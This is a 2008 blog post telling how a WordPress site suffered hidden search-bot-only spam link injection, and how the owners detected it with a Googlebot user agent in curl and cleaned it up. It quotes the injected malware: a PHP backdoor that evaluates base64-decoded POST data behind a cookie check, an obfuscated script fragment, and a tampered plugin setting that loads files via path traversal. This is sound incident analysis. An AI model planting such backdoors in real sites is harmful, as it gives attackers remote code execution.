WordPress exploit: we been hit by hidden spam link injection

May 26th, 2008 mysurface Posted in curl, curlftpfs, file, find, Misc | Hits: 138050 | 49 Comments »

We been hit by hidden spam link injection (a modified version of goro spam injection), this crack injects spam links through wordpress wp_footer() or wp_head() hook. The spam links only reveal itself if crawled by search engine bot such as googlebot, and they are hidden from our eyes. We believe the cracker’s purpose is to steal your search index and improves their page rank.

This exploits are very difficult to detect, because you can’t find the hidden spam links from your web source if you surf your page with web browser. Until one day, your traffics goes down exponentially, and discovered the spam links appear in google cache. But that is too late!

How’s the spam links look:

<div id="_wp_footer">
...
.. ALL THE SPAM LINKS HERE ...
...
</div>
<script type="text/javascript"><!--
google_ad_client = "pub-7652328300112263";
google_ad_width = 728;
google_ad_height = 15;
google_ad_format = "728x15_0ads_al_s";
google_ad_channel = "";
function google_ads(str){var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; id
google_ads("http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E455C544248504F53434F0304084C4C50423A02
//-->
</script>

How to detects them?
We can’t wait until the exploit been discover by googlebot and ruin our google index, so there must be a way for us to verify at any time. For us, we use curl. Changing the user agent to googlebot with curl and crawl your own page like this:

curl --no-sessionid --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)" http://linux.byexamples.com

Thanks to Toydi, we have done some findings on how the exploit affects us. Here, let us tells you what we have learn from the exploit, suggestion to solve the problems, and reveal of this exploit.

How to solve this?
Once you realized your site been exploit, what you must have in your mind is upgrade your WordPress, and removes the infected files. There is a fastest way to temporary stop the spam injection. Removes wp_footer() and wp_head() hook from your themes. The hook should be store in footer.php and header.php.

Removes footer and header hooks does not really clean the affected files, but the spam links will disappear if you check with curl again. This doesn’t really solve the problems.

Where are the affected files?
Affected files can be any where, they probably have a common name, but crackers may change the name patterns any time for the next attempt. So, we highly suggest you do a fresh install unless it is too much trouble for you to do that.

The affected files can be stay at

/wp-content/uploads
/wp-content/plugins
/wp-content/themes
/wp-includes
/wp-admins
/

with patterns such ask *_new.php, *_old.php, *.jpgg, *.giff, *.pngg, wp-info.txt

Removes them in a batch using find command line, you can access your ftp server with curlftpfs.

find . -name "*_new.php" -exec rm {} \;
find . -name "*_old.php" -exec rm {} \;
find . -name "*.jpgg" -exec rm {} \;
find . -name "*_giff" -exec rm {} \;
find . -name "*_pngg" -exec rm {} \;

In fact, infected files can be any php files, compare them with the original one. Some of the images are actually not image, use file command to verify them. we find one of the gif file in my theme/images folder is actually a encrypted php codes. The cracker is very smart to hide that from detected!

file * | grep -v image

Check every files of your themes, we discovered injected codes at our headers.php and singles.php:

<?php if(md5($_COOKIE['_wp_debugger'])=="2435265e6253721e9a8e200d1ebbc54e"){ eval(base64_decode($_POST['file'])); exit; } ?>

See!? cracker decodes his php codes with base64_decode()!!! They try to blind your eyes from detecting them.

Database exploits
We modified the add_action() in plugin.php to print out all function names registered to 'wp_footer' action hook. Then, we caught a strange function name, echo123, but we couldn’t find echo123 in our wordpress codes as well as in database. But after we connects WordPress with new database, the spam links gone. So, it must be something wrong within the database. And our guess is right!

1. The cracker modify the active_plugins field of wp_options table.

a:3:{i:0;s:117:"../../../../../../../../../../../../../../../../../../../../../../tmp/tmpYwbXT2/sess_779ceef92a4fdcc17bb5ee3f13348bfd";i:1;s:46:"../../wp-content/themes/default/header_old.gif";i:2;s:27:"SK2/spam_karma_2_plugin.php";}

../../../../../../../../../../../../../../../../../../../../../../tmp/tmpYwbXT2/sess_779ceef92a4fdcc17bb5ee3f13348bfd and ../../wp-content/themes/default/header_old.gif are the exploit codes, removes them accordingly.

2. If wordpress_options and internal_links_cache fields exist in your wp_options table, removes them, they are your nightmare!!!

3. Check your wp_users table and removes ‘WordPress’ user.

For WordPress database exploit, please refers to Toydi’s findings.

It probably more than 3 fields, if you discover extra infected fields, please let us know, thanks in advance.

Who is behind this?
Seriously We don’t know, but based on what we have, we make some guess, feel free to give yours.

From the spam injection, we observed that the spam links appended with a modified google adsense script with key pub-7652328300112263. Who’s key is that? Do he steal your income as well as messing your google index? Only google adsense team would able to answer this.

From the spam links, its all redirection to wwwDOTyeah-oopsDOTcom and titusonenineDOTclassicalanglicanDOTnet, are they the cracker? I tried to email them asking why they crack my page, but of cause until today, I didn’t received any replies from them.

P.S. Replace DOT with . I do not want to create more keywords for them anymore.

Okay, let us crawl their web with user agent as googlebot

curl --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)" http://wwwDOTyeah-oopsDOTcom/ | less

Surprisingly their page are been injected with spam too, but the links redirect to wwwDOTarticulateDOTcom/blog/

And crawl further, there are no more spam links injected. Heh! Who are they?

I suggest you to check your blogs frequently with curl, take fast action before they mess up your google index again.